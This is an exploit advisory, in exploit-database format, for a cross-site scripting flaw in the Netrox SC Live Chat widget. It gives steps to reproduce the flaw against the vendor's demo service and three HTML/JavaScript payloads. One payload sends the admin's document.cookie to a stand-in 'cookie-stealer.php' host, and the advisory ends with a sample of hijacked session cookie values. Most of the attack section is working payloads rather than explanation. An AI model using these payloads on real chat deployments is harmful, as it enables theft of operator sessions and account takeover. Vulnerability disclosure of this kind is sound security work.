/*!
* # Exploit Title: Netrox SC Live Chat Software for websites Reflected XSS Injection
* # Google Dork: -
* # Date: 2019/08/02
* # Author: m0ze
* # Vendor Homepage: https://www.netroxsc.com/ || https://www.netroxsc.ru/
* # Software Link: https://www.netroxsc.com/ || https://www.netroxsc.ru/ || https://sys.netrox.sc
* # Version: -
* # Tested on: NginX
* # CVE: -
* # CWE: CWE-79
*/
::- Details & Description -::
~ The «Netrox SC Live Chat Software for websites» web-application is vulnerable to Reflected XSS injection that allows an attacker to inject JavaScript/HTML code into the live chat with authorized operator/admin, redirect operator/admin to another website or steal cookies and hijack an active admin/operator session.
::- Demo Website -::
~ Registration: https://sys.netrox.sc/signup
~ Frontend: https://www.netroxsc.com/ || https://www.netroxsc.ru/ || ur own domain for test purposes
~ Backend (auth): https://sys.netrox.sc/enter
::- Special Note -::
~ To reproduce described issue and install the demo chat, you need a domain and ability to create an HTML page on it.
~ Keep in mind that ur payload will work UNTILL u send it to chat. In other words, keep the chat open IN A «TYPING» STATE.
::- PoC Links -::
~ -
::- PoC [Persistent XSS Injection] -::
~ Register a new account https://sys.netrox.sc/signup and configure chat/account settings, then go to https://sys.netrox.sc/t_site_theme_simple/show page and press the «System code» button. Copy/paste provided code to ur demo website page (f.e. blank index.html page), save changes and ur demo website must be ready for some tests. Then go to ur demo website page with «Netrox SC Live Chat» widget, open chat and start typing ur payload (check examples below) but DON'T SEND THE MESSAGE in chat. Then go to the admin area https://sys.netrox.sc/t_workdesk and double click on a new chat alert, wait ~3 seconds and ur payload will work.
~ Example #0: <h1 onmouseover=alert(`m0ze`);>m0ze</h1>
~ Example #1: <img src=x onerror=(alert)(document.cookie);window.location='https://twitter.com/m0ze_ru';//">
~ Example #2: <img src=x onerror=alert('OK');this.src='https://your.domain.tld/cookie-stealer.php?c='+document.cookie>
::- PoC [Hijacked Session Cookies Sample] -::
NXSID=1q36j5aq6pzd408gha0bg8zn14;
auth_token=4eq848d1330m3efd6272301338db2588d2f7d4cnef5293213dc74d99ded7713b;